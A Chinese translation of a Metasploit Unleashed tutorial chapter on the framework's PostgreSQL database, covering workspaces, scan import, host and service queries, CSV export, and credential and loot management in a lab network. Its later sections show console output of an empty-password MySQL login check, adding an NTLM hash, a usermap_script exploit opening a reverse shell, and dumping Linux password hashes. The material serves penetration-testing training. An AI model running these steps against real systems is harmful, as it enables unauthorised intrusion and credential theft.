翻译者说明1:本文为Metasploit Unleashed中文版翻译。原文链接:https://www.offensive-security.com/metasploit-unleashed/
翻译者说明2:为减轻翻译负担采用了机器翻译,翻译者从中人工剔除了机翻错误或歧义的问题,但难免会存在小问题,请读者见谅。如发现文章翻译存在问题,可在文章下方评论留言。
翻译者说明3:如果你喜欢这篇翻译,请给关注一下我并给文章点个赞,你的支持是给我工作的最大鼓励。
翻译者说明4:其他章节一并整合在专栏中,如有兴趣可关注专栏了解更多内容。
四、METASPLOIT 基础
5. Metasploit 中的数据库
在进行渗透测试时,跟踪您在目标网络上(或对目标网络)所做的一切通常是一项挑战。在这里,配置数据库可以节省大量时间。Metasploit内置了对PostgreSQL数据库系统的支持。
该系统允许快速轻松地访问扫描信息,并使我们能够从各种第三方工具导入和导出扫描结果。我们还可以使用此信息来相当快速地配置模块选项。最重要的是,它使我们的结果保持干净和有条理。
msf > help database
Database Backend Commands
=========================
Command Description
------- -----------
db_connect Connect to an existing database
db_disconnect Disconnect from the current database instance
db_export Export a file containing the contents of the database
db_import Import a scan result file (filetype will be auto-detected)
db_nmap Executes nmap and records the output automatically
db_rebuild_cache Rebuilds the database-stored module cache
db_status Show the current database status
hosts List all hosts in the database
loot List all loot in the database
notes List all notes in the database
services List all services in the database
vulns List all vulnerabilities in the database
workspace Switch between database workspaces
msf > hosts
Hosts
=====
address mac name os_name os_flavor os_sp purpose info comments
------- --- ---- ------- --------- ----- ------- ---- --------
172.16.194.134 Unknown device
172.16.194.163 172.16.194.163 Linux Ubuntu server
172.16.194.172 00:0C:29:D1:62:80 172.16.194.172 Linux Ubuntu server
msf > services -p 21
Services
========
host port proto name state info
---- ---- ----- ---- ----- ----
172.16.194.172 21 tcp ftp open vsftpd 2.3.4
1)设置我们的Metasploit数据库
在 Kali 中,您需要在使用数据库之前启动 postgresql 服务器。
root@kali:~# systemctl start postgresql
启动 postgresql 后,您需要使用 msfdb init 创建和初始化 msf 数据库
root@kali:~# msfdb init
Creating database user 'msf'
Enter password for new role:
Enter it again:
Creating databases 'msf' and 'msf_test'
Creating configuration file in /usr/share/metasploit-framework/config/database.yml
Creating initial database schema
2)在 Metasploit 中使用工作区
当我们加载msfconsole并运行db_status时,我们可以确认Metasploit已成功连接到数据库。
msf > db_status
[*] postgresql connected to msf
看到此功能是为了按顺序跟踪我们的活动和扫描。我们必须从正确的方向开始。一旦连接到数据库,我们就可以开始使用所谓的"工作区"来组织不同的运动。例如,这使我们能够保存来自不同位置/网络/子网的不同扫描。
从 msfconsole 发出workspace命令,将显示当前选定的工作区。连接到数据库时,将选择default工作区,该工作区由其名称旁边的 * 表示。
msf > workspace
* default
msfu
lab1
lab2
lab3
lab4
msf >
正如我们所看到的,在保持"整洁"方面,这可能非常方便。让我们将当前工作区更改为"msfu"。
msf > workspace msfu
[*] Workspace: msfu
msf > workspace
default
* msfu
lab1
lab2
lab3
lab4
msf >
创建和删除工作区时,只需在 msfconsole 提示符下使用 -a 或 -d 后跟名称。
msf > workspace -a lab4
[*] Added workspace: lab4
msf >
msf > workspace -d lab4
[*] Deleted workspace: lab4
msf > workspace
就是这么简单,使用相同的命令并添加 -h 开关将为我们提供命令的其他功能。
msf > workspace -h
Usage:
workspace List workspaces
workspace -v List workspaces verbosely
workspace [name] Switch workspace
workspace -a [name] ... Add workspace(s)
workspace -d [name] ... Delete workspace(s)
workspace -D Delete all workspaces
workspace -r Rename workspace
workspace -h Show this help information
msf >
从现在开始,从第三方应用程序的任何扫描或导入都将保存到此工作区中。
现在,我们已经连接到数据库和工作区设置,让我们看一下用一些数据填充它。首先,我们将查看可以使用 msfconsole 中的 help 命令使用的不同"db_"命令。
msf > help
...snip...
Database Backend Commands
=========================
Command Description
------- -----------
creds List all credentials in the database
db_connect Connect to an existing database
db_disconnect Disconnect from the current database instance
db_export Export a file containing the contents of the database
db_import Import a scan result file (filetype will be auto-detected)
db_nmap Executes nmap and records the output automatically
db_rebuild_cache Rebuilds the database-stored module cache
db_status Show the current database status
hosts List all hosts in the database
loot List all loot in the database
notes List all notes in the database
services List all services in the database
vulns List all vulnerabilities in the database
workspace Switch between database workspaces
3)导入和扫描
有几种方法可以做到这一点,从直接从控制台扫描主机或网络,或者从早期扫描导入文件。让我们从导入"Metasploitable 2"主机的 nmap 扫描开始。这是使用db_import后跟文件的路径来完成的。
msf > db_import /root/msfu/nmapScan
[*] Importing 'Nmap XML' data
[*] Import: Parsing with 'Rex::Parser::NmapXMLStreamParser'
[*] Importing host 172.16.194.172
[*] Successfully imported /root/msfu/nmapScan
msf > hosts
Hosts
=====
address mac name os_name os_flavor os_sp purpose info comments
------- --- ---- ------- --------- ----- ------- ---- --------
172.16.194.172 00:0C:29:D1:62:80 Linux Ubuntu server
msf >
完成后,我们可以通过发出 hosts 命令来确认导入。这将显示存储在当前工作区中的所有主机。我们还可以使用db_nmap命令直接从控制台扫描主机。扫描结果将保存在我们当前的数据库中。该命令的工作方式与命令行版本的 nmap 相同。
msf > db_nmap -A 172.16.194.134
[*] Nmap: Starting Nmap 5.51SVN ( http://nmap.org ) at 2012-06-18 12:36 EDT
[*] Nmap: Nmap scan report for 172.16.194.134
[*] Nmap: Host is up (0.00031s latency).
[*] Nmap: Not shown: 994 closed ports
[*] Nmap: PORT STATE SERVICE VERSION
[*] Nmap: 80/tcp open http Apache httpd 2.2.17 ((Win32) mod_ssl/2.2.17 OpenSSL/0.9.8o PHP/5.3.4
...snip...
[*] Nmap: HOP RTT ADDRESS
[*] Nmap: 1 0.31 ms 172.16.194.134
[*] Nmap: OS and Service detection performed. Please report any incorrect results at http://nmap.org/submit/ .
[*] Nmap: Nmap done: 1 IP address (1 host up) scanned in 14.91 seconds
msf >
msf > hosts
Hosts
=====
address mac name os_name os_flavor os_sp purpose info comments
------- --- ---- ------- --------- ----- ------- ---- --------
172.16.194.134 00:0C:29:68:51:BB Microsoft Windows XP server
172.16.194.172 00:0C:29:D1:62:80 Linux Ubuntu server
msf >
4)备份我们的数据
将我们的数据导出到Metasploit环境之外非常简单。使用db_export命令,我们收集的所有信息都可以保存在XML文件中。此格式以后可以轻松使用和操作,以用于报告目的。该命令有2个输出,xml格式,它将导出当前存储在我们活动工作区中的所有信息,以及pwdump格式,它导出与使用/收集的凭据相关的所有内容。
msf > db_export -h
Usage:
db_export -f [-a] [filename]
Format can be one of: xml, pwdump
[-] No output file was specified
msf > db_export -f xml /root/msfu/Exported.xml
[*] Starting export of workspace msfu to /root/msfu/Exported.xml [ xml ]...
[*] >> Starting export of report
[*] >> Starting export of hosts
[*] >> Starting export of events
[*] >> Starting export of services
[*] >> Starting export of credentials
[*] >> Starting export of web sites
[*] >> Starting export of web pages
[*] >> Starting export of web forms
[*] >> Starting export of web vulns
[*] >> Finished export of report
[*] Finished export of workspace msfu to /root/msfu/Exported.xml [ xml ]...
5)使用主机命令
现在,我们可以在数据库中导入和导出信息,让我们看一下如何在 msfconsole 中使用此信息。许多命令可用于搜索存储在我们数据库中的特定信息。主机名称、地址、发现的服务等。我们甚至可以使用生成的数据来填充模块设置,例如RHOSTS。稍后我们将介绍如何完成此操作。
hosts 命令之前用于确认数据库中是否存在数据。让我们看一下可用的不同选项,看看我们如何使用它来为我们提供快速和有用的信息。使用 -h 发出命令将显示帮助菜单。
msf > hosts -h
Usage: hosts [ options ] [addr1 addr2 ...]
OPTIONS:
-a,--add Add the hosts instead of searching
-d,--delete Delete the hosts instead of searching
-c <col1,col2> Only show the given columns (see list below)
-h,--help Show this help information
-u,--up Only show hosts which are up
-o Send output to a file in csv format
-O Order rows by specified column number
-R,--rhosts Set RHOSTS from the results of the search
-S,--search Search string to filter by
-i,--info Change the info of a host
-n,--name Change the name of a host
-m,--comment Change the comment of a host
-t,--tag Add or specify a tag to a range of hosts
Available columns: address, arch, comm, comments, created_at, cred_count, detected_arch, exploit_attempt_count, host_detail_count, info, mac, name, note_count, os_family, os_flavor, os_lang, os_name, os_sp, purpose, scope, service_count, state, updated_at, virtual_host, vuln_count, tags
我们将首先要求 hosts 命令使用 -c 开关仅显示 IP 地址和操作系统类型。
msf > hosts -c address,os_flavor
Hosts
=====
address os_flavor
------- ---------
172.16.194.134 XP
172.16.194.172 Ubuntu
6)设置模块
我们提供的另一个有趣的功能是能够搜索所有条目中的特定内容。想象一下,如果我们只想从扫描中找到基于Linux的计算机。为此,我们将使用 -S 选项。此选项可以与我们前面的示例结合使用,并帮助微调我们的结果。
msf > hosts -c address,os_flavor -S Linux
Hosts
=====
address os_flavor
------- ---------
172.16.194.172 Ubuntu
msf >
使用上一个示例的输出,我们将它馈送到’tcp’扫描辅助模块中。
msf auxiliary(tcp) > show options
Module options (auxiliary/scanner/portscan/tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
CONCURRENCY 10 yes The number of concurrent ports to check per host
FILTER no The filter string for capturing traffic
INTERFACE no The name of the interface
PCAPFILE no The name of the PCAP capture file to process
PORTS 1-10000 yes Ports to scan (e.g. 22-25,80,110-900)
RHOSTS yes The target address range or CIDR identifier
SNAPLEN 65535 yes The number of bytes to capture
THREADS 1 yes The number of concurrent threads
TIMEOUT 1000 yes The socket connect timeout in milliseconds
我们可以看到,默认情况下,"RHOSTS"中未设置任何内容,我们将向 hosts 命令添加 -R 开关并运行模块。希望它能毫无问题地运行并扫描我们的目标。
msf auxiliary(tcp) > hosts -c address,os_flavor -S Linux -R
Hosts
=====
address os_flavor
------- ---------
172.16.194.172 Ubuntu
RHOSTS => 172.16.194.172
msf auxiliary(tcp) > run
[*] 172.16.194.172:25 - TCP OPEN
[*] 172.16.194.172:23 - TCP OPEN
[*] 172.16.194.172:22 - TCP OPEN
[*] 172.16.194.172:21 - TCP OPEN
[*] 172.16.194.172:53 - TCP OPEN
[*] 172.16.194.172:80 - TCP OPEN
...snip...
[*] 172.16.194.172:5432 - TCP OPEN
[*] 172.16.194.172:5900 - TCP OPEN
[*] 172.16.194.172:6000 - TCP OPEN
[*] 172.16.194.172:6667 - TCP OPEN
[*] 172.16.194.172:6697 - TCP OPEN
[*] 172.16.194.172:8009 - TCP OPEN
[*] 172.16.194.172:8180 - TCP OPEN
[*] 172.16.194.172:8787 - TCP OPEN
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
当然,如果我们的结果包含多个地址,这也有效。
msf auxiliary(tcp) > hosts -R
Hosts
=====
address mac name os_name os_flavor os_sp purpose info comments
------- --- ---- ------- --------- ----- ------- ---- --------
172.16.194.134 00:0C:29:68:51:BB Microsoft Windows XP server
172.16.194.172 00:0C:29:D1:62:80 Linux Ubuntu server
RHOSTS => 172.16.194.134 172.16.194.172
msf auxiliary(tcp) > show options
Module options (auxiliary/scanner/portscan/tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
CONCURRENCY 10 yes The number of concurrent ports to check per host
FILTER no The filter string for capturing traffic
INTERFACE no The name of the interface
PCAPFILE no The name of the PCAP capture file to process
PORTS 1-10000 yes Ports to scan (e.g. 22-25,80,110-900)
RHOSTS 172.16.194.134 172.16.194.172 yes The target address range or CIDR identifier
SNAPLEN 65535 yes The number of bytes to capture
THREADS 1 yes The number of concurrent threads
TIMEOUT 1000 yes The socket connect timeout in milliseconds
您可以看到,如果我们的数据库包含数百个条目,这可能是多么有用。我们只能搜索Windows机器,然后非常快速地为smb_version辅助模块设置RHOSTS选项。设置 RHOSTS 开关在几乎所有与数据库交互的命令中都可用。
7)services 命令
搜索数据库的另一种方法是使用 services 命令。与前面的例子一样,我们可以毫不费力地提取非常具体的信息。
msf > services -h
Usage: services [-h] [-u] [-a] [-r ] [-p >port1,port2>] [-s >name1,name2>] [-o ] [addr1 addr2 ...]
-a,--add Add the services instead of searching
-d,--delete Delete the services instead of searching
-c <col1,col2> Only show the given columns
-h,--help Show this help information
-s <name1,name2> Search for a list of service names
-p <port1,port2> Search for a list of ports
-r Only show [tcp|udp] services
-u,--up Only show services which are up
-o Send output to a file in csv format
-R,--rhosts Set RHOSTS from the results of the search
-S,--search Search string to filter by
Available columns: created_at, info, name, port, proto, state, updated_at
与 hosts 命令非常相似,我们可以指定要显示的字段。与 -S 开关结合使用,我们还可以搜索包含特定字符串的服务。
msf > services -c name,info 172.16.194.134
Services
========
host name info
---- ---- ----
172.16.194.134 http Apache httpd 2.2.17 (Win32) mod_ssl/2.2.17 OpenSSL/0.9.8o PHP/5.3.4 mod_perl/2.0.4 Perl/v5.10.1
172.16.194.134 msrpc Microsoft Windows RPC
172.16.194.134 netbios-ssn
172.16.194.134 http Apache httpd 2.2.17 (Win32) mod_ssl/2.2.17 OpenSSL/0.9.8o PHP/5.3.4 mod_perl/2.0.4 Perl/v5.10.1
172.16.194.134 microsoft-ds Microsoft Windows XP microsoft-ds
172.16.194.134 mysql
在这里,我们使用包含字符串"http"的服务名称搜索数据库中包含的所有主机。
msf > services -c name,info -S http
Services
========
host name info
---- ---- ----
172.16.194.134 http Apache httpd 2.2.17 (Win32) mod_ssl/2.2.17 OpenSSL/0.9.8o PHP/5.3.4 mod_perl/2.0.4 Perl/v5.10.1
172.16.194.134 http Apache httpd 2.2.17 (Win32) mod_ssl/2.2.17 OpenSSL/0.9.8o PHP/5.3.4 mod_perl/2.0.4 Perl/v5.10.1
172.16.194.172 http Apache httpd 2.2.8 (Ubuntu) DAV/2
172.16.194.172 http Apache Tomcat/Coyote JSP engine 1.1
搜索的组合是巨大的。我们可以使用特定端口或端口范围。使用 -s 或 -S 开关时的完整或部分服务名称。对于所有主机或仅选择少数主机…这个清单不胜枚举。以下是一些示例,但您可能需要尝试这些功能才能获得所需内容和搜索内容。
msf > services -c info,name -p 445
Services
========
host info name
---- ---- ----
172.16.194.134 Microsoft Windows XP microsoft-ds microsoft-ds
172.16.194.172 Samba smbd 3.X workgroup: WORKGROUP netbios-ssn
msf > services -c port,proto,state -p 70-81
Services
========
host port proto state
---- ---- ----- -----
172.16.194.134 80 tcp open
172.16.194.172 75 tcp closed
172.16.194.172 71 tcp closed
172.16.194.172 72 tcp closed
172.16.194.172 73 tcp closed
172.16.194.172 74 tcp closed
172.16.194.172 70 tcp closed
172.16.194.172 76 tcp closed
172.16.194.172 77 tcp closed
172.16.194.172 78 tcp closed
172.16.194.172 79 tcp closed
172.16.194.172 80 tcp open
172.16.194.172 81 tcp closed
msf > services -s http -c port 172.16.194.134
Services
========
host port
---- ----
172.16.194.134 80
172.16.194.134 443
msf > services -S Unr
Services
========
host port proto name state info
---- ---- ----- ---- ----- ----
172.16.194.172 6667 tcp irc open Unreal ircd
172.16.194.172 6697 tcp irc open Unreal ircd
8)CSV 导出
主机和服务命令都为我们提供了一种将查询结果保存到文件中的方法。文件格式为逗号分隔值或 CSV。后跟带有路径和文件名的 -o,此时屏幕上显示的信息现在将保存到磁盘。
msf > services -s http -c port 172.16.194.134 -o /root/msfu/http.csv
[*] Wrote services to /root/msfu/http.csv
msf > hosts -S Linux -o /root/msfu/linux.csv
[*] Wrote hosts to /root/msfu/linux.csv
msf > cat /root/msfu/linux.csv
[*] exec: cat /root/msfu/linux.csv
address,mac,name,os_name,os_flavor,os_sp,purpose,info,comments
"172.16.194.172","00:0C:29:D1:62:80","","Linux","Debian","","server","",""
msf > cat /root/msfu/http.csv
[*] exec: cat /root/msfu/http.csv
host,port
"172.16.194.134","80"
"172.16.194.134","443"
9)creds 命令
creds 命令用于管理数据库中目标的已找到和已用凭据。在没有任何选项的情况下运行此命令将显示当前保存的凭据。
msf > creds
Credentials
===========
host port user pass type active?
---- ---- ---- ---- ---- -------
[*] Found 0 credentials.
与"db_nmap“命令一样,与凭据相关的成功结果将自动保存到我们的活动工作区。让我们运行辅助模块"mysql_login”,看看当Metasploit扫描我们的服务器时会发生什么。
msf auxiliary(mysql_login) > run
[*] 172.16.194.172:3306 MYSQL - Found remote MySQL version 5.0.51a
[*] 172.16.194.172:3306 MYSQL - [1/2] - Trying username:'root' with password:''
[*] 172.16.194.172:3306 - SUCCESSFUL LOGIN 'root' : ''
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
msf auxiliary(mysql_login) > creds
Credentials
===========
host port user pass type active?
---- ---- ---- ---- ---- -------
172.16.194.172 3306 root password true
[*] Found 1 credential.
msf auxiliary(mysql_login) >
我们可以看到该模块能够连接到我们的mysql服务器,并且由于这个原因,Metasploit自动将凭据保存在我们的数据库中以供将来参考。
在主机被利用后,收集用户凭据是一项重要活动,以便进一步渗透目标网络。当我们收集凭据集时,我们可以使用 creds -a 命令将它们添加到我们的数据库中。
msf > creds -a 172.16.194.134 -p 445 -u Administrator -P 7bf4f254b222bb24aad3b435b51404ee:2892d26cdf84d7a70e2eb3b9f05c425e:::
[*] Time: 2012-06-20 20:31:42 UTC Credential: host=172.16.194.134 port=445 proto=tcp sname= type=password user=Administrator pass=7bf4f254b222bb24aad3b435b51404ee:2892d26cdf84d7a70e2eb3b9f05c425e::: active=true
msf > creds
Credentials
===========
host port user pass type active?
---- ---- ---- ---- ---- -------
172.16.194.134 445 Administrator 7bf4f254b222bb24aad3b435b51404ee:2892d26cdf84d7a70e2eb3b9f05c425e::: password true
[*] Found 1 credential.
10)loot 命令
一旦您破坏了一个(或三个)系统,其中一个目标可能是检索哈希转储。从 Windows 或 *nix 系统。如果哈希转储成功,此信息将存储在我们的数据库中。我们可以使用 loot 命令查看此转储。与几乎每个命令一样,添加 -h 开关将显示更多信息。
msf > loot -h
Usage: loot
Info: loot [-h] [addr1 addr2 ...] [-t <type1,type2>]
Add: loot -f [fname] -i [info] -a [addr1 addr2 ...] [-t [type]
Del: loot -d [addr1 addr2 ...]
-a,--add Add loot to the list of addresses, instead of listing
-d,--delete Delete *all* loot matching host and type
-f,--file File with contents of the loot to add
-i,--info Info of the loot to add
-t <type1,type2> Search for a list of types
-h,--help Show this help information
-S,--search Search string to filter by
下面是一个示例,说明如何使用一些战利品loot填充数据库。
msf exploit(usermap_script) > exploit
[*] Started reverse double handler
[*] Accepted the first client connection...
[*] Accepted the second client connection...
[*] Command: echo 4uGPYOrars5OojdL;
[*] Writing to socket A
[*] Writing to socket B
[*] Reading from sockets...
[*] Reading from socket B
[*] B: "4uGPYOrars5OojdL\r\n"
[*] Matching...
[*] A is input...
[*] Command shell session 1 opened (172.16.194.163:4444 -> 172.16.194.172:55138) at 2012-06-27 19:38:54 -0400
^Z
Background session 1? [y/N] y
msf exploit(usermap_script) > use post/linux/gather/hashdump
msf post(hashdump) > show options
Module options (post/linux/gather/hashdump):
Name Current Setting Required Description
---- --------------- -------- -----------
SESSION 1 yes The session to run this module on.
msf post(hashdump) > sessions -l
Active sessions
===============
Id Type Information Connection
-- ---- ----------- ----------
1 shell unix 172.16.194.163:4444 -> 172.16.194.172:55138 (172.16.194.172)
msf post(hashdump) > run
[+] root:$1$/avpfBJ1$x0z8w5UF9Iv./DR9E9Lid.:0:0:root:/root:/bin/bash
[+] sys:$1$fUX6BPOt$Miyc3UpOzQJqz4s5wFD9l0:3:3:sys:/dev:/bin/sh
[+] klog:$1$f2ZVMS4K$R9XkI.CmLdHhdUE3X9jqP0:103:104::/home/klog:/bin/false
[+] msfadmin:$1$XN10Zj2c$Rt/zzCW3mLtUWA.ihZjA5/:1000:1000:msfadmin,,,:/home/msfadmin:/bin/bash
[+] postgres:$1$Rw35ik.x$MgQgZUuO5pAoUvfJhfcYe/:108:117:PostgreSQL administrator,,,:/var/lib/postgresql:/bin/bash
[+] user:$1$HESu9xrH$k.o3G93DGoXIiQKkPmUgZ0:1001:1001:just a user,111,,:/home/user:/bin/bash
[+] service:$1$kR3ue7JZ$7GxELDupr5Ohp6cjZ3Bu//:1002:1002:,,,:/home/service:/bin/bash
[+] Unshadowed Password File: /root/.msf4/loot/20120627193921_msfu_172.16.194.172_linux.hashes_264208.txt
[*] Post module execution completed
msf post(hashdump) > loot
Loot
====
host service type name content info path
---- ------- ---- ---- ------- ---- ----
172.16.194.172 linux.hashes unshadowed_passwd.pwd text/plain Linux Unshadowed Password File /root/.msf4/loot/20120627193921_msfu_172.16.194.172_linux.hashes_264208.txt
172.16.194.172 linux.passwd passwd.tx text/plain Linux Passwd File /root/.msf4/loot/20120627193921_msfu_172.16.194.172_linux.passwd_953644.txt
172.16.194.172 linux.shadow shadow.tx text/plain Linux Password Shadow File /root/.msf4/loot/20120627193921_msfu_172.16.194.172_linux.shadow_492948.txt
4400
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
